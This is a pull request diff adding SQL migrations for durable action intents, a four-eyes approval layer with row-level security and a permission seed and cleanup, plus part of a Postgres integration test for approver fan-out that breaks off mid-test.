### PR TITLE
feat(approvals): durable action-intents & Tier-3 approval layer (Plan 1)

### DIFF
--- a/apps/api/migrations/2026-07-18-action-intents.sql
+++ b/apps/api/migrations/2026-07-18-action-intents.sql
@@ -87,7 +87,12 @@ BEGIN
      OR NEW.action_version IS DISTINCT FROM OLD.action_version
      OR NEW.arguments IS DISTINCT FROM OLD.arguments
      OR NEW.argument_digest IS DISTINCT FROM OLD.argument_digest
+     OR NEW.target_summary IS DISTINCT FROM OLD.target_summary
+     OR NEW.impact_summary IS DISTINCT FROM OLD.impact_summary
+     OR NEW.reason IS DISTINCT FROM OLD.reason
      OR NEW.risk_tier IS DISTINCT FROM OLD.risk_tier
+     OR NEW.connection_id IS DISTINCT FROM OLD.connection_id
+     OR NEW.tenant_id IS DISTINCT FROM OLD.tenant_id
      OR NEW.idempotency_key IS DISTINCT FROM OLD.idempotency_key
      OR NEW.correlation_id IS DISTINCT FROM OLD.correlation_id
      OR NEW.created_at IS DISTINCT FROM OLD.created_at
@@ -141,6 +146,11 @@ CREATE TABLE IF NOT EXISTS intent_outbox (
 
 CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx
   ON intent_outbox (created_at) WHERE published_at IS NULL;
+-- Matches the Drizzle `intentIdIdx` declaration in actionIntents.ts. Needed
+-- for cascade/join lookups by intent_id (e.g. approval-decision workers
+-- resolving outbox rows for a given intent) on an otherwise-unbounded table.
+CREATE INDEX IF NOT EXISTS intent_outbox_intent_id_idx
+  ON intent_outbox (intent_id);
 
 ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY;
 ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY;
@@ -159,6 +169,26 @@ CREATE INDEX IF NOT EXISTS approval_requests_intent_id_idx
 -- against the shipped migration set) — this is a net-new CHECK, not an
 -- extension of an existing one. All-NULL rows (plain MCP step-up / dev-seed
 -- approvals with no source link) must remain legal.
+--
+-- Preflight: count (never mutate) any pre-existing approval_requests rows
+-- that already violate the at-most-one-source rule, so a constraint-add
+-- failure on a populated table is diagnosable from the migration log instead
+-- of a bare 23514 with no context. Warn-only per the repo's cleanup-statement
+-- convention — no rows are touched here.
+DO $$
+DECLARE
+  n INTEGER;
+BEGIN
+  SELECT COUNT(*) INTO n
+  FROM approval_requests
+  WHERE (execution_id IS NOT NULL)::int
+      + (elevation_request_id IS NOT NULL)::int
+      + (intent_id IS NOT NULL)::int > 1;
+  IF n > 0 THEN
+    RAISE WARNING 'approval_requests_one_source_chk preflight found % row(s) already violating the at-most-one-source rule', n;
+  END IF;
+END $$;
+
 ALTER TABLE approval_requests DROP CONSTRAINT IF EXISTS approval_requests_one_source_chk;
 ALTER TABLE approval_requests ADD CONSTRAINT approval_requests_one_source_chk
   CHECK (

--- a/apps/api/migrations/2026-07-18-action-intents.sql
+++ b/apps/api/migrations/2026-07-18-action-intents.sql
@@ -1,0 +1,168 @@
+-- 2026-07-18: Action intents & durable approval layer — schema foundation
+-- (spec docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md).
+--
+-- action_intents: org-scoped (Shape 1, direct org_id), durable record of a
+-- Tier-3 tool call awaiting/undergoing human approval. Identity/attribution
+-- columns plus a block of IMMUTABLE action-content columns (locked by the
+-- trigger below — material edits are a new intent, not an update) plus a
+-- mutable lifecycle block (status/timestamps/decision/result).
+--
+-- status/source/event_type are TEXT + CHECK rather than native Postgres ENUM
+-- types (unlike elevation_status/approval_status) — this table's lifecycle is
+-- expected to gain new terminal/error states as later stages (M365 mutation
+-- executors) land, and CHECK-constraint columns are cheaper to extend
+-- (DROP CONSTRAINT IF EXISTS + re-add) than ALTER TYPE ... ADD VALUE. Mirrors
+-- the m365_connections.profile/status convention introduced in
+-- 2026-07-13-m365-control-plane-foundation.sql.
+--
+-- intent_outbox: transactional outbox, written in the same transaction as the
+-- intent row/status transition it announces. System-scoped (no org RLS,
+-- workers only) — same shape as device_commands; documented as
+-- INTENTIONAL_UNSCOPED in rls-coverage.integration.test.ts. Its FK to
+-- action_intents is ON DELETE CASCADE, so org erasure cleans it up for free —
+-- no separate entry in tenantCascade.ts's CORE_ORG_CASCADE_DELETE_ORDER.
+--
+-- approval_requests gains a nullable intent_id FK (ON DELETE CASCADE) beside
+-- the existing execution_id / elevation_request_id source links, plus a
+-- bound_argument_digest column recording what content a decision approved.
+--
+-- Idempotent throughout: CREATE TABLE/INDEX IF NOT EXISTS, ADD COLUMN IF NOT
+-- EXISTS, DO-guarded trigger/constraint creation, DROP POLICY IF EXISTS before
+-- each CREATE POLICY. autoMigrate wraps this file in one transaction — no
+-- inner BEGIN/COMMIT. gen_random_uuid() is the Postgres 13+ builtin (no
+-- pgcrypto, never gen_random_bytes).
+
+CREATE TABLE IF NOT EXISTS action_intents (
+  id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+  org_id UUID NOT NULL REFERENCES organizations(id),
+  partner_id UUID REFERENCES partners(id),
+  requested_by_user_id UUID REFERENCES users(id) ON DELETE SET NULL,
+  requesting_api_key_id UUID REFERENCES api_keys(id) ON DELETE SET NULL,
+  source TEXT NOT NULL CHECK (source IN ('chat','mcp_api')),
+  requesting_client_label VARCHAR(255),
+  action_name VARCHAR(255) NOT NULL,
+  action_version INTEGER NOT NULL DEFAULT 1,
+  arguments JSONB NOT NULL DEFAULT '{}',
+  argument_digest CHAR(64) NOT NULL,
+  target_summary TEXT NOT NULL,
+  impact_summary TEXT NOT NULL,
+  reason TEXT,
+  risk_tier SMALLINT NOT NULL,
+  connection_id UUID,
+  tenant_id UUID,
+  idempotency_key TEXT NOT NULL,
+  correlation_id UUID NOT NULL,
+  status TEXT NOT NULL DEFAULT 'pending_approval'
+    CHECK (status IN ('pending_approval','approved','executing','completed','failed','rejected','expired','cancelled')),
+  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
+  expires_at TIMESTAMPTZ NOT NULL,
+  decided_at TIMESTAMPTZ,
+  decided_by_user_id UUID REFERENCES users(id) ON DELETE SET NULL,
+  decided_assurance_level SMALLINT,
+  decided_via TEXT,
+  executed_at TIMESTAMPTZ,
+  result JSONB,
+  error_code TEXT,
+  CONSTRAINT action_intents_one_actor_chk
+    CHECK ((requested_by_user_id IS NULL) <> (requesting_api_key_id IS NULL))
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS action_intents_org_idem_uniq
+  ON action_intents (org_id, idempotency_key);
+CREATE INDEX IF NOT EXISTS action_intents_org_status_idx
+  ON action_intents (org_id, status, expires_at);
+
+-- Immutability trigger: the identity/attribution + content columns listed
+-- below (§3.1/§3.4 of the spec) may never change after insert. Material
+-- edits are a new intent + new approvals. Lifecycle columns (status,
+-- timestamps, decision/result/error) are intentionally NOT checked here —
+-- those are exactly the columns state transitions are allowed to mutate.
+CREATE OR REPLACE FUNCTION action_intents_block_content_update() RETURNS trigger AS $$
+BEGIN
+  IF NEW.org_id IS DISTINCT FROM OLD.org_id
+     OR NEW.requested_by_user_id IS DISTINCT FROM OLD.requested_by_user_id
+     OR NEW.requesting_api_key_id IS DISTINCT FROM OLD.requesting_api_key_id
+     OR NEW.source IS DISTINCT FROM OLD.source
+     OR NEW.action_name IS DISTINCT FROM OLD.action_name
+     OR NEW.action_version IS DISTINCT FROM OLD.action_version
+     OR NEW.arguments IS DISTINCT FROM OLD.arguments
+     OR NEW.argument_digest IS DISTINCT FROM OLD.argument_digest
+     OR NEW.risk_tier IS DISTINCT FROM OLD.risk_tier
+     OR NEW.idempotency_key IS DISTINCT FROM OLD.idempotency_key
+     OR NEW.correlation_id IS DISTINCT FROM OLD.correlation_id
+     OR NEW.created_at IS DISTINCT FROM OLD.created_at
+     OR NEW.expires_at IS DISTINCT FROM OLD.expires_at THEN
+    RAISE EXCEPTION 'action_intents content is immutable';
+  END IF;
+  RETURN NEW;
+END $$ LANGUAGE plpgsql;
+
+DO $$ BEGIN
+  IF NOT EXISTS (SELECT 1 FROM pg_trigger WHERE tgname = 'action_intents_immutable_trg') THEN
+    CREATE TRIGGER action_intents_immutable_trg BEFORE UPDATE ON action_intents
+      FOR EACH ROW EXECUTE FUNCTION action_intents_block_content_update();
+  END IF;
+END $$;
+
+-- RLS: direct org_id (Shape 1) — standard org isolation. breeze_has_org_access
+-- already grants system scope, so no separate system-only branch is needed
+-- (matches the device_link_groups / device_recovery_keys precedent).
+ALTER TABLE action_intents ENABLE ROW LEVEL SECURITY;
+ALTER TABLE action_intents FORCE ROW LEVEL SECURITY;
+
+DROP POLICY IF EXISTS breeze_org_isolation_select ON action_intents;
+DROP POLICY IF EXISTS breeze_org_isolation_insert ON action_intents;
+DROP POLICY IF EXISTS breeze_org_isolation_update ON action_intents;
+DROP POLICY IF EXISTS breeze_org_isolation_delete ON action_intents;
+
+CREATE POLICY breeze_org_isolation_select ON action_intents
+  FOR SELECT USING (public.breeze_has_org_access(org_id));
+CREATE POLICY breeze_org_isolation_insert ON action_intents
+  FOR INSERT WITH CHECK (public.breeze_has_org_access(org_id));
+CREATE POLICY breeze_org_isolation_update ON action_intents
+  FOR UPDATE USING (public.breeze_has_org_access(org_id))
+  WITH CHECK (public.breeze_has_org_access(org_id));
+CREATE POLICY breeze_org_isolation_delete ON action_intents
+  FOR DELETE USING (public.breeze_has_org_access(org_id));
+
+-- intent_outbox: transactional outbox. System-scoped — no RLS policies are
+-- created, so under FORCE ROW LEVEL SECURITY only the system DB context
+-- (which bypasses RLS via withSystemDbAccessContext) can read/write it, same
+-- as device_commands. Workers claim rows under withSystemDbAccessContext.
+CREATE TABLE IF NOT EXISTS intent_outbox (
+  id BIGSERIAL PRIMARY KEY,
+  intent_id UUID NOT NULL REFERENCES action_intents(id) ON DELETE CASCADE,
+  event_type TEXT NOT NULL CHECK (event_type IN ('intent_created','intent_approved')),
+  payload JSONB NOT NULL DEFAULT '{}',
+  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
+  published_at TIMESTAMPTZ,
+  publish_attempts INTEGER NOT NULL DEFAULT 0
+);
+
+CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx
+  ON intent_outbox (created_at) WHERE published_at IS NULL;
+
+ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY;
+ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY;
+
+-- approval_requests: new nullable intent_id link (one intent fans out to N
+-- approver rows) + bound_argument_digest (what content the decision approved).
+ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS intent_id UUID
+  REFERENCES action_intents(id) ON DELETE CASCADE;
+ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS bound_argument_digest CHAR(64);
+
+CREATE INDEX IF NOT EXISTS approval_requests_intent_id_idx
+  ON approval_requests (intent_id);
+
+-- At most one of execution_id / elevation_request_id / intent_id may be set.
+-- No prior constraint of this shape existed on approval_requests (verified
+-- against the shipped migration set) — this is a net-new CHECK, not an
+-- extension of an existing one. All-NULL rows (plain MCP step-up / dev-seed
+-- approvals with no source link) must remain legal.
+ALTER TABLE approval_requests DROP CONSTRAINT IF EXISTS approval_requests_one_source_chk;
+ALTER TABLE approval_requests ADD CONSTRAINT approval_requests_one_source_chk
+  CHECK (
+    (execution_id IS NOT NULL)::int
+    + (elevation_request_id IS NOT NULL)::int
+    + (intent_id IS NOT NULL)::int <= 1
+  );

--- a/apps/api/migrations/2026-07-18-action-intents.sql
+++ b/apps/api/migrations/2026-07-18-action-intents.sql
@@ -130,10 +130,10 @@ CREATE POLICY breeze_org_isolation_update ON action_intents
 CREATE POLICY breeze_org_isolation_delete ON action_intents
   FOR DELETE USING (public.breeze_has_org_access(org_id));
 
--- intent_outbox: transactional outbox. System-scoped — no RLS policies are
--- created, so under FORCE ROW LEVEL SECURITY only the system DB context
--- (which bypasses RLS via withSystemDbAccessContext) can read/write it, same
--- as device_commands. Workers claim rows under withSystemDbAccessContext.
+-- intent_outbox: transactional outbox, deliberately WITHOUT row level
+-- security (see the comment below the table, after the FK/indexes, for the
+-- full rationale). Written under the creating request's org context,
+-- drained under withSystemDbAccessContext — same as device_commands.
 CREATE TABLE IF NOT EXISTS intent_outbox (
   id BIGSERIAL PRIMARY KEY,
   intent_id UUID NOT NULL REFERENCES action_intents(id) ON DELETE CASCADE,
@@ -152,8 +152,29 @@ CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx
 CREATE INDEX IF NOT EXISTS intent_outbox_intent_id_idx
   ON intent_outbox (intent_id);
 
-ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY;
-ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY;
+-- No ALTER TABLE ... ROW LEVEL SECURITY here, intentionally. intent_outbox is
+-- truly unscoped, matching device_commands (see apps/api/src/db/schema/devices.ts
+-- and its migration — grep confirms no ENABLE/FORCE ROW LEVEL SECURITY there
+-- either). Reasoning:
+--   * breeze_app is NOSUPERUSER NOBYPASSRLS, and withSystemDbAccessContext
+--     only sets the breeze.scope GUC — it does NOT escalate role or bypass
+--     RLS. So FORCE ROW LEVEL SECURITY with zero policies is default-DENY
+--     for every access path, including the system context, and would 42501
+--     on every INSERT.
+--   * The row is written inside createActionIntent's transaction, which runs
+--     under the CALLING REQUEST's org-scoped context (breeze.scope=
+--     'organization'), while the publisher worker (later task) reads/updates
+--     it under breeze.scope='system'. No single scoped policy can cover both
+--     access paths without either leaking to orgs or blocking the worker.
+--   * The payload is ids-only (intent id + event type; no tenant data), and
+--     no route ever exposes this table directly — it is purely a
+--     worker-internal delivery queue, drained by trusted background code.
+--     Tenant isolation is enforced one hop away, on action_intents itself
+--     (Shape 1, org_id, ENABLE+FORCE+policies above) and via the ON DELETE
+--     CASCADE FK from intent_id, so org erasure still cleans this table up
+--     for free.
+-- Documented as INTENTIONAL_UNSCOPED in rls-coverage.integration.test.ts,
+-- mirroring device_commands exactly.
 
 -- approval_requests: new nullable intent_id link (one intent fans out to N
 -- approver rows) + bound_argument_digest (what content the decision approved).

--- a/apps/api/migrations/2026-07-18-action-intents.sql
+++ b/apps/api/migrations/2026-07-18-action-intents.sql
@@ -67,8 +67,23 @@ CREATE TABLE IF NOT EXISTS action_intents (
     CHECK ((requested_by_user_id IS NULL) <> (requesting_api_key_id IS NULL))
 );
 
+-- Idempotency dedup is scoped to LIVE intents only (PARTIAL unique index), not
+-- a total one. A total unique index on (org_id, idempotency_key) would let a
+-- single TERMINAL intent (completed/expired/rejected/cancelled/failed) block
+-- every future identical request (same tool + same canonicalized args) from
+-- that requester forever — a legitimate re-run tomorrow of the same script on
+-- the same device would 23505 against a months-old, already-finished row.
+-- Restricting the index to the three LIVE statuses means at most one LIVE
+-- intent can exist per (org_id, idempotency_key) at a time (the actual
+-- invariant createActionIntent needs for its replay-vs-create branch), while
+-- a new request after the prior one terminalizes creates a fresh row.
+-- DROP INDEX IF EXISTS first: this migration is unshipped, but a dev DB may
+-- already have applied an earlier (total) revision of it, and DROP+CREATE
+-- keeps re-application idempotent regardless of which revision is present.
+DROP INDEX IF EXISTS action_intents_org_idem_uniq;
 CREATE UNIQUE INDEX IF NOT EXISTS action_intents_org_idem_uniq
-  ON action_intents (org_id, idempotency_key);
+  ON action_intents (org_id, idempotency_key)
+  WHERE status IN ('pending_approval', 'approved', 'executing');
 CREATE INDEX IF NOT EXISTS action_intents_org_status_idx
   ON action_intents (org_id, status, expires_at);
 

--- a/apps/api/migrations/2026-07-18-b-approvals-decide-seed.sql
+++ b/apps/api/migrations/2026-07-18-b-approvals-decide-seed.sql
@@ -1,0 +1,68 @@
+-- Seed approvals:decide permission and grant it to existing Org Admin roles.
+--
+-- Without this, already-deployed orgs have zero eligible approvers for
+-- Tier-3 chat action-intents: the approval-eligibility check finds no role
+-- holding approvals:decide, so every Tier-3 intent instantly cancels with
+-- reason 'no_eligible_approvers'.
+--
+-- Partner Admin already holds the wildcard '*:*' permission, so it needs no
+-- explicit row here. Org Admin roles are seeded per-partner (one row per
+-- partner), so this must sweep ALL of them, not a single row.
+--
+-- Idempotent: safe to re-run. permissions.id defaults to gen_random_uuid()
+-- at the DB level (see 0001-baseline.sql), so no id is supplied on insert.
+--
+-- NOTE: permissions has no UNIQUE constraint on (resource, action) — only a
+-- primary key on id (verified against the live schema). `ON CONFLICT DO
+-- NOTHING` with no matching unique/exclusion constraint is NOT a no-op guard
+-- here (there is nothing for it to conflict against), so it would silently
+-- insert a duplicate row on every re-apply. Use an explicit existence check
+-- instead, matching the established pattern in
+-- 2026-05-02-report-permissions.sql.
+
+DO $$
+DECLARE
+  n integer := 0;
+BEGIN
+  IF NOT EXISTS (
+    SELECT 1 FROM permissions WHERE resource = 'approvals' AND action = 'decide'
+  ) THEN
+    INSERT INTO permissions (resource, action, description)
+    VALUES ('approvals', 'decide', 'Decide (approve/deny) pending action-intent approvals');
+    GET DIAGNOSTICS n = ROW_COUNT;
+  END IF;
+
+  IF n > 0 THEN
+    RAISE WARNING 'seeded % approvals:decide permission row(s)', n;
+  END IF;
+END $$;
+
+DO $$
+DECLARE
+  n integer;
+  v_permission_id uuid;
+BEGIN
+  -- Scalar lookup (not a JOIN) so this stays correct even if a duplicate
+  -- permissions row were ever present — always resolves to exactly one id.
+  SELECT id INTO v_permission_id
+  FROM permissions
+  WHERE resource = 'approvals' AND action = 'decide'
+  ORDER BY id
+  LIMIT 1;
+
+  INSERT INTO role_permissions (role_id, permission_id)
+  SELECT r.id, v_permission_id
+  FROM roles r
+  WHERE r.name = 'Org Admin'
+    AND r.scope = 'organization'
+    AND v_permission_id IS NOT NULL
+    AND NOT EXISTS (
+      SELECT 1 FROM role_permissions rp
+      WHERE rp.role_id = r.id AND rp.permission_id = v_permission_id
+    );
+
+  GET DIAGNOSTICS n = ROW_COUNT;
+  IF n > 0 THEN
+    RAISE WARNING 'granted approvals:decide to % existing Org Admin role(s)', n;
+  END IF;
+END $$;

--- a/apps/api/migrations/2026-07-18-b-approvals-decide-seed.sql
+++ b/apps/api/migrations/2026-07-18-b-approvals-decide-seed.sql
@@ -50,11 +50,19 @@ BEGIN
   ORDER BY id
   LIMIT 1;
 
+  -- is_system = TRUE is LOAD-BEARING, not cosmetic: custom org roles accept an
+  -- arbitrary caller-supplied name (routes/roles.ts POST creates them with
+  -- is_system = false), so matching on name alone would silently grant this
+  -- security-sensitive permission to any attacker-created role named
+  -- 'Org Admin'. Only the built-in per-partner Org Admin roles carry
+  -- is_system = TRUE. Mirrors the established pattern in
+  -- 2026-06-29-vuln-risk-accept-permission.sql.
   INSERT INTO role_permissions (role_id, permission_id)
   SELECT r.id, v_permission_id
   FROM roles r
   WHERE r.name = 'Org Admin'
     AND r.scope = 'organization'
+    AND r.is_system = TRUE
     AND v_permission_id IS NOT NULL
     AND NOT EXISTS (
       SELECT 1 FROM role_permissions rp

--- a/apps/api/migrations/2026-07-18-c-ai-executions-intent-id.sql
+++ b/apps/api/migrations/2026-07-18-c-ai-executions-intent-id.sql
@@ -1,0 +1,33 @@
+-- 2026-07-18-c: link ai_tool_executions rows to the durable action_intents
+-- row they were created for (spec
+-- docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md,
+-- whole-branch review CRITICAL-3).
+--
+-- The web chat's per-step approval card (POST
+-- /ai/sessions/:id/approve/:executionId -> handleApproval in
+-- services/aiAgent.ts) only ever flipped ai_tool_executions.status. For
+-- Tier-3 tools that is no longer the source of truth once
+-- services/actionIntents/intentService.ts's createActionIntent takes over —
+-- the chat flow blocks on action_intents.status via waitForIntentDecision,
+-- so a handleApproval call that only touches ai_tool_executions is a silent
+-- no-op: it reports success but nothing unblocks. This column lets
+-- handleApproval detect an intent-backed execution and refuse to report a
+-- self-approval success for it (the intents flow is a four-eyes model — the
+-- requester is usually NOT an eligible approver of their own intent).
+--
+-- Nullable: legacy Tier-2 per_step executions (and helper/PAM executions)
+-- never go through createActionIntent and keep intent_id NULL — handleApproval
+-- keeps flipping ai_tool_executions.status directly for those, unchanged.
+--
+-- ON DELETE SET NULL (not CASCADE): the execution ledger row documents what
+-- the chat session did; it must survive an intent row being purged/erased
+-- independently rather than being silently deleted out from under the chat
+-- transcript. Idempotent (ADD COLUMN IF NOT EXISTS). No inner
+-- BEGIN/COMMIT — autoMigrate wraps this file in one transaction.
+
+ALTER TABLE ai_tool_executions
+  ADD COLUMN IF NOT EXISTS intent_id UUID REFERENCES action_intents(id) ON DELETE SET NULL;
+
+CREATE INDEX IF NOT EXISTS ai_tool_executions_intent_id_idx
+  ON ai_tool_executions (intent_id)
+  WHERE intent_id IS NOT NULL;

--- a/apps/api/migrations/2026-07-18-c-approvals-decide-seed-cleanup.sql
+++ b/apps/api/migrations/2026-07-18-c-approvals-decide-seed-cleanup.sql
@@ -1,0 +1,38 @@
+-- Cleanup for the approvals:decide seed (2026-07-18-b): an earlier revision of
+-- that migration granted approvals:decide to EVERY organization-scoped role
+-- named 'Org Admin', including custom (is_system = false) roles. Because
+-- routes/roles.ts POST lets a caller with users:write create a custom role
+-- with an arbitrary name, a role named 'Org Admin' could have been minted
+-- specifically to catch this grant and join the Tier-3 approver pool.
+--
+-- 2026-07-18-b has since been corrected to require is_system = TRUE, but
+-- breeze_migrations keys on filename, so the corrected file will NOT re-run on
+-- any database that already applied the buggy version. This forward migration
+-- REVOKEs the erroneous grant from every non-system role so already-migrated
+-- databases converge on the intended state.
+--
+-- Forensic trail (per the migration conventions): the DELETE reports its row
+-- count as a WARNING even when 0, so a non-zero count is a durable record that
+-- a custom role had been granted the permission.
+--
+-- Idempotent: re-running finds nothing left to delete and warns 0.
+
+DO $$
+DECLARE
+  n integer;
+BEGIN
+  DELETE FROM role_permissions rp
+  USING roles r, permissions p
+  WHERE rp.role_id = r.id
+    AND rp.permission_id = p.id
+    AND p.resource = 'approvals'
+    AND p.action = 'decide'
+    AND r.name = 'Org Admin'
+    AND r.scope = 'organization'
+    AND r.is_system = FALSE;
+
+  GET DIAGNOSTICS n = ROW_COUNT;
+  IF n > 0 THEN
+    RAISE WARNING 'approvals-decide-cleanup: revoked approvals:decide from % non-system Org Admin role(s)', n;
+  END IF;
+END $$;

--- a/apps/api/src/__tests__/integration/intentFanout.integration.test.ts
+++ b/apps/api/src/__tests__/integration/intentFanout.integration.test.ts
@@ -1,0 +1,258 @@
+/**
+ * Real-Postgres proof of the Batch-1 approver fan-out fix (commit
+ * d01882b24 "fix(intents): resolve approvers across org+partner axes under
+ * system context").
+ *
+ * Before that fix, `createActionIntent`'s cross-user `approval_requests`
+ * insert ran under the REQUESTER's org-scoped DB context. `approval_requests`
+ * is Shape-6 user-scoped RLS (`WITH CHECK user_id = breeze_current_user_id()
+ * OR scope = 'system'` — migration 2026-05-16-approval-shape6-system-bypass.sql),
+ * so inserting a row for an approver OTHER than the requester denied with
+ * Postgres 42501 and aborted the whole creation. The fully-mocked unit tests
+ * (`intentService.test.ts`) mock `../../db` wholesale and therefore can never
+ * exercise a real RLS policy — this is the belt-and-suspenders CI guard
+ * `intentService.ts`'s own header comment promises (see the TX2 block
+ * there), run against the real `breeze_app` (NOBYPASSRLS) driver.
+ *
+ * This file lives under `src/__tests__/integration/` (not co-located with
+ * the service) specifically so it's picked up automatically by the glob
+ * include in `vitest.integration.config.ts` and the glob exclude in
+ * `vitest.config.ts`, both of which target that directory wholesale — a
+ * `src/services` placement would instead need both configs hand-edited with
+ * an explicit filename, and silently never runs in CI (or reds the unit job
+ * on ECONNREFUSED) if either edit is missed.
+ */
+import './setup';
+import { afterEach, beforeEach, describe, expect, it } from 'vitest';
+import { randomUUID } from 'crypto';
+import { eq, inArray } from 'drizzle-orm';
+import { db, withSystemDbAccessContext } from '../../db';
+import {
+  actionIntents,
+  approvalRequests,
+  organizationUsers,
+  partnerUsers,
+  rolePermissions,
+  roles,
+  users,
+} from '../../db/schema';
+import { buildOrgAccessClosures, type AuthContext } from '../../middleware/auth';
+import { createActionIntent, transitionIntent } from '../../services/actionIntents/intentService';
+import { PERMISSIONS } from '../../services/permissions';
+import {
+  assignUserToOrganization,
+  assignUserToPartner,
+  createOrganization,
+  createPartner,
+  createRole,
+  createUser,
+  grantRolePermissions,
+} from './db-utils';
+
+/** Builds a real AuthContext for a requester acting on `orgId`, the same
+ * shape `authMiddleware` produces for a live org-scoped session — reuses the
+ * SAME closure factory (`buildOrgAccessClosures`) so org-access semantics
+ * can never drift between the live request path and this test. */
+function requesterAuth(user: { id: string; email: string }, orgId: string, partnerId: string, roleId: string): AuthContext {
+  const { orgCondition, canAccessOrg } = buildOrgAccessClosures([orgId]);
+  return {
+    user: { id: user.id, email: user.email, name: 'Requester', isPlatformAdmin: false },
+    token: {
+      sub: user.id,
+      email: user.email,
+      roleId,
+      orgId,
+      partnerId,
+      scope: 'organization',
+      type: 'access',
+      mfa: true,
+    },
+    partnerId,
+    orgId,
+    scope: 'organization',
+    accessibleOrgIds: [orgId],
+    orgCondition,
+    canAccessOrg,
+  };
+}
+
+interface Scenario {
+  partnerId: string;
+  orgId: string;
+  requester: { id: string; email: string };
+  orgApprover: { id: string; email: string };
+  partnerApprover: { id: string; email: string };
+  requesterRoleId: string;
+  userIds: string[];
+  roleIds: string[];
+}
+
+/** Seeds one org under one partner, plus three users:
+ *  - requester: org member, ALSO holds approvals:decide (proves the id-based
+ *    self-exclusion filter, not just incidental ineligibility).
+ *  - orgApprover: org member (organization_users row) holding approvals:decide.
+ *  - partnerApprover: partner member (partner_users row, org_access='all',
+ *    NO organization_users row at all) holding approvals:decide — exactly
+ *    the population CRITICAL-2 exists to surface.
+ * Seeded fresh inside beforeEach (not beforeAll): setup.ts TRUNCATEs the
+ * core tenant tables on every test's beforeEach, so a beforeAll fixture
+ * would be silently wiped before the first `it()` runs. */
+async function seedScenario(): Promise<Scenario> {
+  const partner = await createPartner();
+  const org = await createOrganization({ partnerId: partner.id });
+
+  const orgRole = await createRole({ scope: 'organization', orgId: org.id });
+  await grantRolePermissions(orgRole.id, [PERMISSIONS.APPROVALS_DECIDE]);
+
+  const partnerRole = await createRole({ scope: 'partner', partnerId: partner.id });
+  await grantRolePermissions(partnerRole.id, [PERMISSIONS.APPROVALS_DECIDE]);
+
+  const requester = await createUser({ partnerId: partner.id, orgId: org.id, email: `requester-${randomUUID()}@intentfanout.test` });
+  await assignUserToOrganization(requester.id, org.id, orgRole.id);
+
+  const orgApprover = await createUser({ partnerId: partner.id, orgId: org.id, email: `org-approver-${randomUUID()}@intentfanout.test` });
+  await assignUserToOrganization(orgApprover.id, org.id, orgRole.id);
+
+  const partnerApprover = await createUser({ partnerId: partner.id, orgId: null, email: `partner-approver-${randomUUID()}@intentfanout.test` });
+  await assignUserToPartner(partnerApprover.id, partner.id, partnerRole.id, 'all');
+
+  return {
+    partnerId: partner.id,
+    orgId: org.id,
+    requester: { id: requester.id, email: requester.email },
+    orgApprover: { id: orgApprover.id, email: orgApprover.email },
+    partnerApprover: { id: partnerApprover.id, email: partnerApprover.email },
+    requesterRoleId: orgRole.id,
+    userIds: [requester.id, orgApprover.id, partnerApprover.id],
+    roleIds: [orgRole.id, partnerRole.id],
+  };
+}
+
+let seeded: Scenario | null = null;
+
+beforeEach(async () => {
+  seeded = await seedScenario();
+});
+
+// Belt-and-suspenders cleanup on top of setup.ts's own per-test TRUNCATE —
+// deletes strictly in FK-child-before-parent order under system scope (the
+// same axis every table here is RLS-gated on; breeze_has_org_access /
+// breeze_has_partner_access special-case scope='system' to true).
+//
+// Deliberately does NOT delete `organizations` / `partners` themselves:
+// `createActionIntent`'s post-commit `recordActionIntentEvent` fire-and-forgets
+// an `audit_logs` row carrying this org's id, and `audit_logs.org_id` has no
+// `ON DELETE CASCADE` — a breeze_app-scoped DELETE on `organizations` would
+// 23503 against it (audit_logs is also append-only: no DELETE grant for
+// breeze_app at all, only the superuser test client's TRUNCATE ... CASCADE
+// can clear it). The next test's global `beforeEach` (setup.ts) TRUNCATEs
+// both tables CASCADE as the superuser client regardless, so leaving these
+// two rows for that sweep is correct, not merely convenient.
+afterEach(async () => {
+  const s = seeded;
+  seeded = null;
+  if (!s) return;
+  await withSystemDbAccessContext(async () => {
+    // action_intents FK-cascades approval_requests + intent_outbox
+    // (ON DELETE CASCADE — migration 2026-07-18-action-intents.sql), so
+    // deleting the org's intents is enough to clear both.
+    await db.delete(actionIntents).where(eq(actionIntents.orgId, s.orgId));
+    await db.delete(organizationUsers).where(eq(organizationUsers.orgId, s.orgId));
+    await db.delete(partnerUsers).where(eq(partnerUsers.partnerId, s.partnerId));
+    await db.delete(rolePermissions).where(inArray(rolePermissions.roleId, s.roleIds));
+    await db.delete(roles).where(inArray(roles.id, s.roleIds));
+    await db.delete(users).where(inArray(users.id, s.userIds));
+  });
+});
+
+describe('createActionIntent — approver fan-out across org+partner axes (real Postgres, breeze_app)', () => {
+  it('fans out approval_requests to the org-member AND partner-member approvers, excludes the requester, persists partner_id, and lands pending_approval', async () => {
+    const s = seeded!;
+    const auth = requesterAuth(s.requester, s.orgId, s.partnerId, s.requesterRoleId);
+
+    // execute_command is a base Tier-3 tool (registerScriptTools,
+    // aiToolsScripts.ts) — no `action` field needed to hit TIER3_ACTIONS,
+    // and createActionIntent never verifies the device exists (that happens
+    // later, at release/execution time), so a bare random UUID is fine here.
+    const snapshot = await createActionIntent(auth, {
+      toolName: 'execute_command',
+      input: { deviceId: randomUUID(), commandType: 'list_processes' },
+      source: 'chat',
+    });
+
+    // This is the exact assertion that 42501'd before d01882b24: the
+    // cross-user approval_requests insert for the OTHER two approvers, run
+    // under the requester's org-scoped context, was denied by Shape-6 RLS
+    // and aborted the whole creation before this line could ever be reached.
+    expect(snapshot.status).toBe('pending_approval');
+    expect(snapshot.approvalRequestIds).toHaveLength(2);
+
+    const fanOutRows = await withSystemDbAccessContext(() =>
+      db
+        .select({ userId: approvalRequests.userId, boundDigest: approvalRequests.boundArgumentDigest })
